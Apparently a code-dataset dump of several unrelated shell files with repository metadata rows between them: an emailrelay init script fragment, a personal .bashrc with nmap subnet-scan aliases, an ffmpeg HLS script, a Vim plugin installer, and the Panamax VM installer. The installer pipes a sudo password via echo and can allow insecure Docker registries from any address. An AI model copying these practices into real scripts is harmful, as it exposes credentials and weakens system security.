[ "$anonymous" = 1 ] && procd_append_param command --anonymous
;;
"cmdline")
# empty by intention (just append extra_cmdline)
;;
*)
echo "no mode specified"
return 1
;;
esac
# Deliberately unquoted: extra_cmdline may contain several arguments that
# must be word-split.
[ -n "$extra_cmdline" ] && procd_append_param command $extra_cmdline
procd_set_param respawn
procd_close_instance
}
# procd service entry point: ensure the spool directory exists, then spawn
# one instance per configured `emailrelay` UCI section.
start_service()
{
	# mkdir -p is idempotent, so the previous `[ ! -d ... ] &&` guard
	# was redundant.
	mkdir -p /var/spool/emailrelay
	config_load "${NAME}"
	config_foreach emailrelay_instance emailrelay
}
| true
|
98fef49e4ca8832f8a80e6e800c7a600535320ec
|
Shell
|
omrisarig13/config
|
/.bashrc
|
UTF-8
| 4,140
| 2.78125
| 3
|
[] |
no_license
|
#
# ~/.bashrc
#
alias mvim="VIMRUNTIME=/usr/share/vim/vim90 /home/omsa/Programs/vim/src/vim"
alias vimm="mvim"
export VISUAL=mvim
export EDITOR="$VISUAL"
alias ls="ls --color"
alias ll="ls -la --color"
alias l="ls -b --color"
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias .....="cd ../../../../"
alias ......="cd ../../../../../"
alias .......="cd ../../../../../../"
alias ........="cd ../../../../../../../"
alias .........="cd ../../../../../../../../"
alias ..........="cd ../../../../../../../../../"
alias ...........="cd ../../../../../../../../../../"
alias ............="cd ../../../../../../../../../../../"
alias .............="cd ../../../../../../../../../../../../"
alias ..............="cd ../../../../../../../../../../../../../"
alias ...............="cd ../../../../../../../../../../../../../../"
alias ................="cd ../../../../../../../../../../../../../../../"
alias .................="cd ../../../../../../../../../../../../../../../../"
alias ..................="cd ../../../../../../../../../../../../../../../../../"
alias ...................="cd ../../../../../../../../../../../../../../../../../../"
alias remove_exes="find . -perm -1 -type f -maxdepth 1 2>/dev/null | xargs rm"
alias ivm="mvim"
alias :e="mvim"
alias :q="exit"
alias :qa="exit"
alias :w=
alias :wa=
alias potion="~/Projects/vim/potion/bin/potion"
alias python=python3
alias pip=pip3
# Some custom commands
alias learn_vim="mvim -u ~/Projects/mvim/vimrc"
alias cmak="cmake"
alias camke="cmake"
alias amke="make"
alias clipboard='xclip -sel clip'
alias ip-scan='sudo nmap -T4 -sP 172.16.6.0/23'
alias ip-scan-rasp='sudo nmap -T4 -sP 172.16.6.0/23 | grep Raspberry -B 2'
alias mount-omsa='sudo mount -o uid=omsa,gid=omsa'
# alias wgit="git.exe"
# export LD_LIBRARY_PATH="${PATH}:/usr/local/lib"
[[ $- != *i* ]] && return
colors() {
local fgc bgc vals seq0
printf "Color escapes are %s\n" '\e[${value};...;${value}m'
printf "Values 30..37 are \e[33mforeground colors\e[m\n"
printf "Values 40..47 are \e[43mbackground colors\e[m\n"
printf "Value 1 gives a \e[1mbold-faced look\e[m\n\n"
# foreground colors
for fgc in {30..37}; do
# background colors
for bgc in {40..47}; do
fgc=${fgc#37} # white
bgc=${bgc#40} # black
vals="${fgc:+$fgc;}${bgc}"
vals=${vals%%;}
seq0="${vals:+\e[${vals}m}"
printf " %-9s" "${seq0:-(default)}"
printf " ${seq0}TEXT\e[m"
printf " \e[${vals:+${vals+$vals;}}1mBOLD\e[m"
done
echo; echo
done
}
[[ -f ~/.extend.bashrc ]] && . ~/.extend.bashrc
[ -r /usr/share/bash-completion/bash_completion ] && . /usr/share/bash-completion/bash_completion
# Complete Yocto commands
[[ -f ~/.config/yocto-completion/yocto_completion.sh ]] && . ~/.config/yocto-completion/yocto_completion.sh
[[ -f ~/.config/yocto-completion/yocto_completion.sh ]] || echo "Warning: No yocto-completion configured"
# Add git data
[[ -f ~/.config/git/completion.sh ]] && . ~/.config/git/completion.sh
[[ -f ~/.config/git/completion.sh ]] || echo "Warning: No git completion configured"
export PATH="${PATH}:/home/omsa/.config/git/git-extra-commands/bin"
[[ -f ~/.local/bin/bashmarks.sh ]] && . ~/.local/bin/bashmarks.sh
[[ -f ~/.local/bin/bashmarks.sh ]] || echo "Warning: No bashmarks configured"
export CY_TOOLS_PATHS="/home/omsa/Programs/Cypress/ModusToolbox_2.4.0.5972/tools_2.4"
parse_git_branch() {
  # Emit " (branch)" for the checked-out git branch, or nothing at all when
  # the current directory is not inside a git repository.  Used from PS1.
  local branches
  branches=$(git branch 2> /dev/null)
  [ -n "$branches" ] && printf '%s\n' "$branches" | sed -e '/^[^*]/d' -e 's/* \(.*\)/ (\1)/'
  return 0
}
PS1="\[\033[1;34m\]\D{} \[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[34m\]\w\[\033[m\]\[\033[36m\]\$(parse_git_branch)\[\033[00m\] \n$ "
bind "set completion-ignore-case on"
bind "set show-all-if-ambiguous on"
set -o vi
bind -m vi-insert "\C-l":clear-screen
bind '"hh":vi-movement-mode'
expor=/usr/share/doc/python2/html/
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
export LIBGPHOTO2_INSTALL_PATH=~/.local
shopt -s cdspell
fortune | cowsay -f tux
export PATH="$PATH:/home/omsa/Downloads/010editor" #ADDED BY 010 EDITOR
| true
|
5536f087aa2d3ae015611a385d4762bfcb57da42
|
Shell
|
widecastlive/nginxffmpeg
|
/scripts/hls.sh
|
UTF-8
| 838
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
# TERM handler: forward a hard kill to every direct child of this script
# so the backgrounded ffmpeg pipeline dies with us.
# NOTE(review): SIGKILL gives children no chance to clean up; sending TERM
# first would be gentler -- confirm before changing.
on_die ()
{
# kill all children
pkill -KILL -P $$
}
# Propagate service shutdown to the ffmpeg child via on_die.
trap 'on_die' TERM
# Work from the HLS output root served by nginx.
cd /opt/data/hls/;
# Transcode the incoming RTMP stream ($1 = app, $2 = stream key) into a
# 3-rendition HLS ladder (1280w / 320w / 1920w, -2 keeps aspect with even
# height) plus a shared AAC audio group; fMP4 segments, 6s target duration,
# master playlist live.m3u8, per-variant playlists under output_%v/.
# (No comments inside the command: backslash continuations must stay intact.)
ffmpeg -i "rtmp://127.0.0.1:1935/$1/$2" \
-filter_complex "[v:0]scale=1920:-2[vout1];[v:0]scale=1280:-2[vout2];[v:0]scale=320:-2[vout3]" \
-g 25 -sc_threshold 0 \
-map "[vout2]" -c:v:0 libx264 -b:v:0 1000k -maxrate:v:0 2500k -bufsize:v:0 5000k \
-map "[vout3]" -c:v:1 libx264 -b:v:1 150k -maxrate:v:1 250k -bufsize:v:1 500k \
-map "[vout1]" -c:v:2 libx264 -b:v:2 2500k -maxrate:v:2 5000k -bufsize:v:2 8000k \
-map a:0 -c:a aac -b:a 92k -ac 2 \
-f hls -hls_time 6 -hls_segment_type fmp4 \
-master_pl_name live.m3u8 \
-strftime 1 -hls_segment_filename output_%v/segment_%s.m4s \
-var_stream_map "a:0,agroup:audio v:0,agroup:audio v:1,agroup:audio v:2,agroup:audio" output_%v/live.m3u8 &
# Run ffmpeg in the background and wait, so the trap can fire on TERM.
wait
| true
|
0a73b23bea9cd606535dd4806cf66d1eb042f898
|
Shell
|
adon988/adam-centos-bootstrap
|
/auto-install-nedrtree.sh
|
UTF-8
| 1,003
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash
# NEDRTree: bootstrap pathogen + NERDTree into ~/.vim.
# Fixed shebang: was "#!bin/bash" (a relative path), which only works when
# the script is executed from / -- use the absolute interpreter path.
# i counts how many install steps actually ran (0 => everything pre-existed).
i=0
if [ ! -e ~/.vim ]; then
echo "mkdir ~/.vim"
mkdir ~/.vim
((i++))
else
echo "Already exists ~/.vim"
fi
if [ ! -d ~/.vim/autoload ]; then
echo "mkdir ~/.vim/autoload"
mkdir ~/.vim/autoload
((i++))
else
echo "Already exists ~/.vim/autoload"
fi
# Create the pathogen bundle directory if missing and count the step.
if [ ! -d ~/.vim/bundle ]; then
echo "mkdir ~/.vim/bundle"
mkdir ~/.vim/bundle
# Fixed: was `i = i+1`, which bash parses as running a command named "i";
# use the arithmetic increment like the other branches.
((i++))
else
echo "Already exists ~/.vim/bundle"
fi
if [ ! -e ~/.vim/autoload/pathogen.vim ]; then
echo "mkdir ~/.vim/autoload/pathogen.vim"
curl -LSso ~/.vim/autoload/pathogen.vim https://tpo.pe/pathogen.vim
((i++))
else
echo "Already exists ~/.vim/autoload/pathogen.vim"
fi
if [ ! -d ~/.vim/bundle/nerdtree ]; then
cd ~/.vim/bundle
git clone https://github.com/scrooloose/nerdtree.git
((i++))
else
echo "Already exists ~/.vim/bundle/nerdtree.git"
fi
if [ $i = 0 ]; then
echo "Maybe you already install NERDTree"
else
echo "execute pathogen#infect()
nnoremap <silent> <F5> :NERDTree<CR>
let NERDTreeShowHidden=1
" >> ~/.vimrc
fi
echo "Finished!"
| true
|
e76d9ac36f076de578110cea36599716b6d5596f
|
Shell
|
CenturyLinkLabs/panamax-coreos
|
/desktop
|
UTF-8
| 22,288
| 2.875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
BASEBOX_DEFAULT="panamax-coreos-box-681.2.0"
BASEBOX_URL_DEFAULT="http://stable.release.core-os.net/amd64-usr/681.2.0/coreos_production_vagrant.box"
PMX_IMAGE_TAG_DEFAULT=stable
PMX_UI_TAGS="https://index.docker.io/v1/repositories/centurylink/panamax-ui/tags"
PMX_API_TAGS="https://index.docker.io/v1/repositories/centurylink/panamax-api/tags"
SETUP_UPDATE_URL="http://download.panamax.io/installer/.versions"
DOCUMENTATION_URL="https://github.com/CenturyLinkLabs/panamax-ui/wiki/Release-Notes"
CWD="${HOME}/.panamax/"
PMX_VAR="${HOME}/.panamax"
ENV="$CWD".env_tmp
ENV_COMMIT="$PMX_VAR"/.env
IMAGES_VDI="$PMX_VAR"/images.vdi
IMAGES_ZIP="$PMX_VAR"/images.tar.gz
IMAGES_CDN="http://download.panamax.io/images.tar.gz"
PMX_VM_NAME="panamax-vm"
PMX_VM_MEMORY_DEFAULT=1536
PMX_VM_CPUS_DEFAULT=2
PMX_VM_PRIVATE_IP="10.0.0.200"
PMX_LOCAL_DOMAIN="panamax.local"
PMX_INSECURE_REGISTRY="n"
echo_install="init: First time installing Panamax! - Downloads CoreOS VM and installs latest Panamax version."
echo_restart="restart: Stops and Starts Panamax."
echo_reinstall="reinstall: Deletes your applications and CoreOS VM; reinstalls to latest Panamax version."
echo_update="download: Updates to latest Panamax version."
echo_checkUpdate="check: Checks for available updates for Panamax."
echo_info="info: Displays version of your local panamax install."
echo_stop="pause: Stops Panamax"
echo_start="up: Starts Panamax"
echo_uninstall="delete: Uninstalls Panamax, deletes applications and CoreOS VM."
echo_ssh="ssh: SSH into Panamax CoreOS VM."
echo_help="help: Show this help"
echo_debug="debug: Display your current Panamax settings."
function displayLogo {
tput clear
echo ""
echo -e "\033[0;31;32m███████╗ ██████╗ █████████╗ ██████╗ \033[0m\033[31;37m ██████████╗ ██████╗ ██╗ ██╗\033[0m"
echo -e "\033[0;31;32m██╔══██║ ╚═══██╗ ███╗ ███║ ╚═══██╗\033[0m\033[31;37m ██║ ██╔ ██║ ╚═══██╗ ╚██╗██╔╝\033[0m"
echo -e "\033[0;31;32m██ ██║ ███████║ ███║ ███║ ███████║\033[0m\033[31;37m ██║╚██║ ██║ ███████║ ╚███╔╝ \033[0m"
echo -e "\033[0;31;32m███████╝ ███████║ ███║ ███║ ███████║\033[0m\033[31;37m ██║╚██║ ██║ ███████║ ██╔██╗ \033[0m"
echo -e "\033[0;31;32m██║ ███████║ ███║ ███║ ███████║\033[0m\033[31;37m ██║╚██║ ██║ ███████║ ██╔╝ ██╗\033[0m"
echo -e "\033[0;31;32m╚═╝ ╚══════╝ ╚══╝ ╚══╝ ╚══════╝\033[0m\033[31;37m ╚═╝ ╚═╝ ╚═╝ ╚══════╝ ╚═╝ ╚═╝\033[0m"
echo ""
echo "CenturyLink Labs - http://www.centurylinklabs.com/"
}
# Verify Vagrant and VirtualBox are installed at supported versions;
# exit 1 with a download hint when either check fails.
# NOTE(review): `grep -w '1.[6-9]'` will not match Vagrant 1.10+ or 2.x,
# so sufficiently new Vagrant is rejected -- confirm intended version range.
# NOTE(review): `2>&1 >/dev/null` sends stderr to the terminal and only
# stdout to /dev/null (redirect order matters) -- presumably intentional
# so version-command errors stay visible.
function checkPreReqs {
echo ""
echo "Checking if required software is installed."
echo ""
vagrant -v | grep -w '1.[6-9]' 2>&1 >/dev/null
if [[ "$?" -ne "0" ]]; then
echo "Please install vagrant version 1.6.3 or newer (https://www.vagrantup.com/downloads.html).";
exit 1;
else
echo $'Vagrant 1.6 or newer installed.'
fi
VBoxManage -v | grep -w '4\.[3-]\|5\.[0-9]' 2>&1 >/dev/null
if [[ "$?" -ne "0" ]]; then
echo "Please install Virtualbox 4.3 or newer (https://www.virtualbox.org/wiki/Downloads).";
exit 1;
else
echo $'Virtualbox 4.3 or newer installed.'
fi
echo ""
}
# Abort (exit 1) with a hint to run `panamax init` when the Panamax VM is
# not registered with VirtualBox.  Globals read: PMX_VM_NAME.
function checkPanamaxVmExists {
  if ! VBoxManage showvminfo "$PMX_VM_NAME" > /dev/null 2>&1; then
    echo "The $PMX_VM_NAME does not exist. Please run ($ panamax init) to install Panamax."
    echo ""
    exit 1;
  fi
}
# Scan the argument list of X.Y.Z version strings and echo the one for
# which the list contains no newer version (when several qualify, the last
# such entry in argument order wins -- same behaviour as before).
function getLatestVersion () {
  local all="$*"
  local candidates=($@)
  local best=${candidates[0]}
  local v
  for v in "${candidates[@]}"; do
    if [[ "$(newerVersionAvailable "$v" "$all")" == "0" ]]; then
      best=$v
    fi
  done
  echo $best
}
# Echo 1 when the space-separated list in $2 contains a version newer than
# $1 (next patch, any next-minor build, or any next-major build); else 0.
function newerVersionAvailable() {
  local v1=$1
  local vList=$2
  # Split MAJ.MIN.PAT with read + shell arithmetic instead of awk + bc:
  # no external dependency on bc, which is not installed everywhere.
  local majVer minVer patVer
  IFS=. read -r majVer minVer patVer <<< "$v1"
  local nextMajVer=$((majVer + 1))
  local nextMinVer=$((minVer + 1))
  local nextPatVer=$((patVer + 1))
  # Dots are escaped so they match literally.  BUG FIX: the major-version
  # pattern previously used an unescaped "+", which is a literal plus sign
  # in basic regex, so major-version bumps were never detected.
  local newVerAvailable=0
  if echo "$vList" | grep -q "$majVer\.$minVer\.$nextPatVer" \
    || echo "$vList" | grep -q "$majVer\.$nextMinVer\.[0-9]\+" \
    || echo "$vList" | grep -q "$nextMajVer\.[0-9]\+\.[0-9]\+"; then
    newVerAvailable=1
  fi
  echo $newVerAvailable
}
function checkForSetupUpdate {
if [[ "$checkedSetupForUpdates" != "1" || "$1" == "u" ]]; then
checkedSetupForUpdates="1"
updateAvailableForSetup="0"
if [[ -f "$ENV" ]]; then
source "$ENV"
versionList=`curl -sL $SETUP_UPDATE_URL | grep tar`
local newVersionAvailable="`newerVersionAvailable $PMX_SETUP_VERSION \"$versionList\"`"
if [[ "$newVersionAvailable" == "1" ]]; then
echo "Local Panamax Installer version:"
echo "$PMX_SETUP_VERSION"
echo ""
echo "*** Panamax Installer is out of date! Please run ($ brew upgrade http://download.panamax.io/installer/brew/panamax.rb && panamax reinstall) to update. ***"
updateAvailableForSetup="1"
elif [[ "$1" == "e" ]]; then
echo "Local Panamax Installer version:"
echo " $PMX_SETUP_VERSION"
echo ""
fi
else
echo ""
fi
fi
}
function checkForPanamaxUpdate {
if [[ "$checkedPmxForUpdates" != "1" || "$1" == "u" ]]; then
checkedPmxForUpdates="1"
updateAvailableForPmx="0"
if [[ -f "$ENV" ]]; then
source "$ENV"
if [[ "$PMX_IMAGE_TAG" == "dev" ]]; then
if [[ "$PMX_INSTALL_DATE" -le "` date -j -v-1d +%s`" ]]; then
echo "You are currently running a Dev version of Panamax which is updated nightly."
echo "A newer Dev version is available. Use the update option to get the latest Dev version."
updateAvailableForPmx="1"
elif [[ "$1" == "e" ]]; then
echo "Local Panamax component versions:"
echo " UI: dev nightly build"
echo " API: dev nightly build"
fi
elif [[ "$PMX_INSTALL_TAG_UI" != "" || "$PMX_INSTALL_TAG_API" != "" || "$1" == "e" ]]; then
latestTagUi="`getLatestVersion $PMX_INSTALL_TAG_UI \"$(getTagsUi)\"`"
latestTagApi="`getLatestVersion $PMX_INSTALL_TAG_API \"$(getTagsApi)\"`"
if [[ "$PMX_INSTALL_TAG_UI" != "$latestTagUi" || "$PMX_INSTALL_TAG_API" != "$latestTagApi" ]]; then
echo "Local Panamax component versions:"
echo " UI: $PMX_INSTALL_TAG_UI"
echo " API: $PMX_INSTALL_TAG_API"
echo "Latest Panamax component versions:"
echo " UI: $latestTagUi"
echo " API: $latestTagApi"
echo ""
echo "*** Panamax is out of date! Please use the download/update option to get the latest. Release notes are available at ($DOCUMENTATION_URL) . ***"
echo ""
updateAvailableForPmx="1"
elif [[ "$1" == "e" ]]; then
echo "Local Panamax component versions:"
echo " UI: $PMX_INSTALL_TAG_UI"
echo " API: $PMX_INSTALL_TAG_API"
fi
fi
else
echo ""
fi
fi
}
# Print the installer version (wrapped in literal double quotes) from the
# .version file under $CWD, then terminate.
# NOTE(review): `exit 0` ends the whole script, not just the function --
# nothing can run after calling this; confirm that is intended.
function getPanamaxSetupVersion {
echo "\"$(<"$CWD.version")\""
exit 0;
}
# Check whether Panamax or the installer has an update available.
# $1 - mode flag: "e" (explicit info) and "u" (update) also re-verify the
# prerequisites and that the VM exists; "u" additionally reports when
# everything is already current.
# Reads globals set by the two check functions: updateAvailableForSetup,
# updateAvailableForPmx.
function checkForUpdate {
if [[ "$1" == "e" || "$1" == "u" ]]; then
checkPreReqs
checkPanamaxVmExists
fi
echo ""
checkForPanamaxUpdate "$1"
checkForSetupUpdate "$1"
if [[ "$1" == "u" && $updateAvailableForSetup == "0" && $updateAvailableForPmx == "0" ]]; then
echo "Panamax is already up to date!"
fi
echo ""
}
# Fetch all published centurylink/panamax-ui image tags matching X.Y.Z from
# the Docker Hub API, echoed as one space-separated line.  Needs network.
function getTagsUi {
echo `curl --silent $PMX_UI_TAGS | grep -o "[0-9]*\.[0-9]*\.[0-9]*" | awk '{ print $1}'`
}
# Fetch all published centurylink/panamax-api image tags matching X.Y.Z from
# the Docker Hub API, echoed as one space-separated line.  Needs network.
function getTagsApi {
echo `curl --silent $PMX_API_TAGS | grep -o "[0-9]*\.[0-9]*\.[0-9]*" | awk '{ print $1}'`
}
# Run vagrant from the Panamax working directory ($CWD), forwarding all
# arguments unchanged.
function runVagrant {
cd "$CWD" && vagrant "$@"
}
# Persist install metadata into the env file via setEnvVar: installer
# version, install timestamp, and -- for the stable channel -- the latest
# published UI/API image tags from Docker Hub.  Needs network on "stable".
function saveVersionInfo {
setEnvVar "PMX_SETUP_VERSION" "\"$(<"$CWD.version")\""
setEnvVar "PMX_INSTALL_DATE" "\"`date +%s`\""
if [[ "$PMX_IMAGE_TAG" == "stable" ]]; then
setEnvVar "PMX_INSTALL_TAG_UI" "`getLatestVersion \"$(getTagsUi)\"`"
setEnvVar "PMX_INSTALL_TAG_API" "`getLatestVersion \"$(getTagsApi)\"`"
fi
setEnvVar "PMX_IMAGE_TAG" "$PMX_IMAGE_TAG"
}
function installPanamax {
# Install (or reinstall, depending on $operation) the Panamax VM:
# collect settings interactively when no CLI args were given, persist
# them to $ENV, optionally add the /etc/hosts alias, then create the VM.
checkPreReqs
# Start from a clean env file; only keep the vagrant dotfile location.
echo "" > $ENV
setEnvVar "VAGRANT_DOTFILE_PATH" "$PMX_VAR"
source $ENV
# Refuse a fresh install when a VM with this name already exists.
if [[ "$operation" == "install" && "`runVagrant status $PMX_VM_NAME --machine-readable | grep "MachineNotFound\|not created"`" == "" ]]; then
echo "A different VM with name $PMX_VM_NAME has been created already. Please re-install or delete $PMX_VM_NAME VM and try again."
exit 1;
fi
if [[ "$operation" == "reinstall" ]]; then
checkPanamaxVmExists
fi
# No CLI arguments: prompt interactively for every install setting.
if [[ $# == 0 ]]; then
echo ""
read -p "Enter memory (MB) to be allocated to Panamax VM($PMX_VM_MEMORY_DEFAULT):" panamaxRam
read -p "Enter CPUs to be allocated to Panamax VM($PMX_VM_CPUS_DEFAULT):" panamaxCpus
read -p "Enter version you want to use(dev/stable, defaults to:$PMX_IMAGE_TAG_DEFAULT)" panamaxVersion
# Only offer the hosts alias when it is not already present.
if [[ "`grep ${PMX_LOCAL_DOMAIN} /etc/hosts`" == "" ]]; then
read -p "Would you like Panamax to create the alias (${PMX_LOCAL_DOMAIN})? (You will be prompted for sudo creds) [y/N]:" localDomain
fi
read -p "Do you want to let Docker daemon allow connections to insecure registries [y/N]: " pmxInsecureRegistry
echo ""
fi
# Add the local domain alias to /etc/hosts (needs sudo; password may have
# been supplied via -sp= on the command line).
if [[ ("`grep ${PMX_LOCAL_DOMAIN} /etc/hosts`" == "") && ("${localDomain}" == "y" || "${localDomain}" == "Y") ]]; then
echo "Setting local alias to ${PMX_LOCAL_DOMAIN}"
if [[ "${sudoPassword}" == "" ]]; then
sudo -S -- sh -c "echo \"${PMX_VM_PRIVATE_IP} ${PMX_LOCAL_DOMAIN}\" >> /etc/hosts"
else
echo ${sudoPassword} | sudo -S -- sh -c "echo \"${PMX_VM_PRIVATE_IP} ${PMX_LOCAL_DOMAIN}\" >> /etc/hosts"
fi
fi
# Apply defaults for anything not provided interactively or via CLI.
panamaxRam=${panamaxRam:-$PMX_VM_MEMORY_DEFAULT}
panamaxCpus=${panamaxCpus:-$PMX_VM_CPUS_DEFAULT}
redownload=${download:-N}
pmxInsecureRegistry=${pmxInsecureRegistry:-$PMX_INSECURE_REGISTRY}
PMX_IMAGE_TAG=${panamaxVersion:-${PMX_IMAGE_TAG:-$PMX_IMAGE_TAG_DEFAULT}}
# First run: copy the setup files into the persistent install directory.
if [ ! -d "$CWD" ]; then
mkdir -p "$CWD"
cp -Rf . "$CWD" > /dev/null
fi
# Drop an obsolete base box if the default box name has changed.
if [[ "$PMX_BASEBOX" != "" && "$PMX_BASEBOX" != "$BASEBOX_DEFAULT" ]]; then
vagrant box remove $PMX_BASEBOX
fi
# Assign a stable per-installation identifier on first install.
if [[ "$PMX_PANAMAX_ID" == "" ]]; then
PMX_PANAMAX_ID="`uuidgen`"
fi
# Persist all resolved settings so later operations can source them.
setEnvVar "PMX_BASEBOX" \"$BASEBOX_DEFAULT\"
setEnvVar "PMX_BASEBOX_URL" \"$BASEBOX_URL_DEFAULT\"
setEnvVar "PMX_VM_MEMORY" $panamaxRam
setEnvVar "PMX_VM_CPUS" $panamaxCpus
setEnvVar "PMX_VM_PRIVATE_IP" \"${PMX_VM_PRIVATE_IP}\"
saveVersionInfo
setEnvVar "PMX_OPERATION" "$operation"
setEnvVar "PMX_VM_NAME" "$PMX_VM_NAME"
setEnvVar "PMX_PANAMAX_ID" \"${PMX_PANAMAX_ID}\"
setEnvVar "PMX_VAR_DIR" "$PMX_VAR"
setEnvVar "PMX_INSECURE_REGISTRY" "$pmxInsecureRegistry"
source "$ENV"
if [[ $operation == "reinstall" ]]; then
echo ""
echo "Reinstalling Panamax..."
if [[ "$#" == "0" ]]; then
read -p "Would you like to re-download coreos base box[y/N]: " redownload
fi
# Detach and release the images disk so the old VM can be deleted
# without destroying the (reusable) VDI.
if [[ -f "$IMAGES_VDI" ]]; then
if [[ "`vboxmanage list runningvms | grep $PMX_VM_NAME`" != "" ]]; then
VBoxManage controlvm $PMX_VM_NAME poweroff
fi
VBoxManage storageattach $PMX_VM_NAME --storagectl "IDE Controller" --port 1 --device 0 --type hdd --medium 'none' > /dev/null 2>&1
VBoxManage closemedium disk $IMAGES_VDI > /dev/null 2>&1
VBoxManage internalcommands sethduuid $IMAGES_VDI
fi
VBoxManage unregistervm $PMX_VM_NAME --delete
if [[ $redownload == "Y" || $redownload == "y" ]]; then
vagrant box remove $PMX_BASEBOX
vagrant box add $PMX_BASEBOX $PMX_BASEBOX_URL
fi
updateCloudConfig
createPmxVM
else
updateCloudConfig
createPmxVM
fi
openPanamax;
}
function updateCloudConfig {
  # Build the CoreOS cloud-config consumed by the VM at boot
  # ($CWD/user-data). The only varying part between the two modes is
  # Docker's --insecure-registry range, so compute it once instead of
  # duplicating the whole document (the original had two near-identical
  # blocks).
  local registryRange="10.10.10.254/24"
  if [[ "`echo $PMX_INSECURE_REGISTRY | tr '[:upper:]' '[:lower:]'`" == "y" ]]; then
    # User opted in to insecure registries: allow connections to any host.
    registryRange="0.0.0.0/0"
  fi
  echo "#cloud-config
write_files:
  - path: /etc/systemd/system/docker.service.d/50-insecure-registry.conf
    content: |
      [Service]
      Environment=DOCKER_OPTS='--insecure-registry=\"${registryRange}\"'" > $CWD/user-data
  # Append any user-supplied cloud-config fragment.
  if [[ -f "$PMX_VAR/cloud_config_usr.yaml" ]]; then
    cat $PMX_VAR/cloud_config_usr.yaml >> $CWD/user-data
  fi
}
function createPmxVM {
# Create the CoreOS VM: ensure the pre-built images disk (VDI) exists
# (extracting/downloading it as needed), reset its UUID, then bring the
# VM up with vagrant.
echo ""
echo "Creating a new CoreOS VM..."
if [[ ! -f "$IMAGES_VDI" ]]; then
# Try to extract a previously downloaded archive first.
if [[ -f "$IMAGES_ZIP" ]]; then
tar -zxf "$IMAGES_ZIP" -C "$PMX_VAR"
download_complete=$?
fi
# Missing or corrupt archive: (re)download, resuming with curl -C -,
# and retry until the archive passes a tar integrity listing.
if [[ "$download_complete" != "0" || ! -f "$IMAGES_ZIP" ]]; then
echo "Downloading images"
download_complete="-1"
until [ "$download_complete" == "0" ];
do
curl -C - $IMAGES_CDN -o "$IMAGES_ZIP" --progress-bar
sleep 2
tar -tzf "$IMAGES_ZIP" >/dev/null
download_complete=$?
done
fi
tar -zxf "$IMAGES_ZIP" -C "$PMX_VAR"
fi
if [[ ! -f "$IMAGES_VDI" ]]; then
echo "Error downloading images disk. Please try again later."
exit 1;
else
# Fresh UUID so VirtualBox accepts the disk as a new medium.
VBoxManage internalcommands sethduuid $IMAGES_VDI
fi
runVagrant up --provider virtualbox || { echo "VM Creation failed. Exiting."; exit 1; }
# The extracted VDI is all we need; drop the archive to save space.
rm -f "$IMAGES_ZIP"
}
function setEnvVar {
  # Persist an environment variable into $ENV as "export NAME=VALUE",
  # first deleting any existing line that defines the same variable.
  #   $1 - variable name
  #   $2 - value (may carry literal surrounding quotes, written as-is)
  # Fix: the original computed a name via sed 's/[PMX_]+//g', but '+' is a
  # literal character under BRE, so that substitution never matched any of
  # the names used here — dead code removed. The final echo is now quoted
  # so values keep their exact whitespace.
  echo "$(sed "/$1=/d" "$ENV")" > "$ENV"
  echo "export $1=$2" >> "$ENV"
}
function openPanamax {
  # Poll the Panamax UI until it answers HTTP 200, then open it in the
  # default browser; if `open` is unavailable/fails, fall back to printing
  # the URL.
  echo "waiting for panamax to start....."
  local pmxUrl="http://${PMX_VM_PRIVATE_IP}:3000"
  # Prefer the friendly local domain when the /etc/hosts alias exists.
  if [[ "`grep ${PMX_LOCAL_DOMAIN} /etc/hosts`" != "" ]]; then
    pmxUrl="http://${PMX_LOCAL_DOMAIN}:3000"
  fi
  until [ `curl -sL -w "%{http_code}" "${pmxUrl}" -o /dev/null` == "200" ];
  do
    printf .
    sleep 2
  done
  echo ""
  # Fix: the fallback message had a misplaced closing quote
  # ("..." to access panamax) — the whole sentence is now one argument.
  open "${pmxUrl}" || { echo "Please go to ${pmxUrl} to access panamax"; }
  echo "Please go to ${pmxUrl} to access panamax."
  echo ""
  echo ""
}
function savePortForwardingRules {
# Snapshot the VM's current NAT port-forwarding rules into a shell script
# ($CWD/.portForwards.sh) made of "VBoxManage controlvm <vm> natpf1 '<rule>'"
# commands, so the rules can be re-applied after a vagrant reload (which
# drops custom forwards). Pipeline: take the Forwarding(n)="..." lines,
# keep the value, strip quotes, prefix the VBoxManage command, and re-quote
# the rule name up to the first comma.
VBoxManage showvminfo $PMX_VM_NAME --machinereadable | grep 'Forwarding' | awk -F"=" '{print $2}' | sed 's/\"//g' | sed "s/^/VBoxManage controlvm $PMX_VM_NAME natpf1 \'/g" | sed "s/,/\',/" > "$CWD.portForwards.sh"
}
function recreatePortForwardingRules {
  # Re-apply the NAT rules captured by savePortForwardingRules.
  # Failures are deliberately ignored (|| true): rules may already exist.
  chmod +x "$CWD.portForwards.sh"
  # Fix: quote $CWD inside the bash -c string so installation paths that
  # contain spaces (e.g. under some home directories) do not break the cd.
  /bin/bash -c "cd \"$CWD\" && ./.portForwards.sh > /dev/null 2>&1" || true
}
function restartPanamax {
# Reload (restart + re-provision) the Panamax VM, preserving the custom
# NAT port-forwarding rules across the reload.
checkPreReqs
checkPanamaxVmExists
echo Restarting Panamax
setEnvVar "PMX_OPERATION" "$operation"
source "$ENV"
# Rules are dropped by `vagrant reload`; capture them first, restore after.
savePortForwardingRules
updateCloudConfig
runVagrant reload --provision || { echo >&2 "Restarting Panamax seems to have failed. Please try again using the reinstall option."; exit 1; }
recreatePortForwardingRules
# NOTE(review): prints recreate's exit status (always 0 given its
# '|| true') — looks like leftover debug output.
echo $?
openPanamax;
echo Restart complete
}
function startPanamax {
# Boot (and provision) the Panamax VM, restoring the saved NAT
# port-forwarding rules afterwards, then open the UI.
checkPreReqs
checkPanamaxVmExists
echo Starting Panamax
setEnvVar "PMX_OPERATION" "$operation"
source "$ENV"
savePortForwardingRules
runVagrant up --provision || { echo >&2 "Starting Panamax seems to have failed. Please try again or use reinstall option."; exit 1; }
recreatePortForwardingRules
openPanamax
echo Start Complete
}
function stopPanamax {
  # Halt the Panamax VM after recording the current operation in $ENV.
  checkPreReqs
  checkPanamaxVmExists
  echo "Stopping Panamax"
